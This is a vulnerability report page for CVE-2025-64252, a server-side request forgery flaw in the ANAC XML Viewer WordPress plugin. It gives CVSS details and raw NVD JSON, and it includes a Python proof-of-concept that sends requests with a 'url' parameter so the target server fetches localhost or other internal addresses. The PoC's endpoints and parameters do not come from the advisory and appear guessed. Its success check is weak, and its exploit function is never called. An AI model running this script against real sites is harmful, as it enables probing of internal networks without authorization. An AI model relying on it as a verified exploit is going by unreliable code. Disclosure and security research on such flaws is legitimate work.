Security Vulnerability Report
中文
CVE-2025-64252 CVSS 4.9 MEDIUM

CVE-2025-64252

Published: 2026-01-22 17:16:00
Last Modified: 2026-04-15 00:35:42

Description

Server-Side Request Forgery (SSRF) vulnerability in Marco Milesi ANAC XML Viewer anac-xml-viewer allows Server Side Request Forgery.This issue affects ANAC XML Viewer: from n/a through <= 1.8.2.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ANAC XML Viewer WordPress插件 <= 1.8.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-64252 PoC - SSRF in ANAC XML Viewer WordPress Plugin # Target: WordPress site with ANAC XML Viewer plugin <= 1.8.2 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-64252 SSRF """ # Test with localhost to verify SSRF test_urls = [ "http://127.0.0.1/", "http://localhost/", ] endpoints = [ "/wp-content/plugins/anac-xml-viewer/", "/?action=anac_xml_viewer", ] print(f"[*] Testing target: {target_url}") for endpoint in endpoints: for test_url in test_urls: try: # Construct the SSRF payload params = { 'url': test_url, 'anac_action': 'fetch_xml' } full_url = target_url.rstrip('/') + endpoint response = requests.get(full_url, params=params, timeout=10) print(f"[+] Sent SSRF request: {test_url}") print(f" Status: {response.status_code}") # Check for SSRF indicators if response.status_code == 200: if 'html' in response.text.lower() or 'body' in response.text.lower(): print(f"[!] Potential SSRF - Server fetched: {test_url}") return True except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def exploit_ssrf(target_url, internal_target): """ Exploit SSRF to access internal resources """ params = { 'url': internal_target, 'anac_action': 'fetch_xml' } print(f"[*] Exploiting SSRF to access: {internal_target}") try: response = requests.get(target_url, params=params, timeout=10) print(f"[+] Response received") print(f" Status: {response.status_code}") print(f" Content-Length: {len(response.content)}") return response.text except Exception as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-64252.py <target_url>") print("Example: python cve-2025-64252.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64252", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:00.090", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in Marco Milesi ANAC XML Viewer anac-xml-viewer allows Server Side Request Forgery.This issue affects ANAC XML Viewer: from n/a through <= 1.8.2."}, {"lang": "es", "value": "Vulnerabilidad de Falsificación de Petición del Lado del Servidor (SSRF) en Marco Milesi ANAC XML Viewer anac-xml-viewer permite falsificación de petición del lado del servidor. Este problema afecta a ANAC XML Viewer: desde n/a hasta &lt;= 1.8.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/anac-xml-viewer/vulnerability/wordpress-anac-xml-viewer-plugin-1-8-2-server-side-request-forgery-ssrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}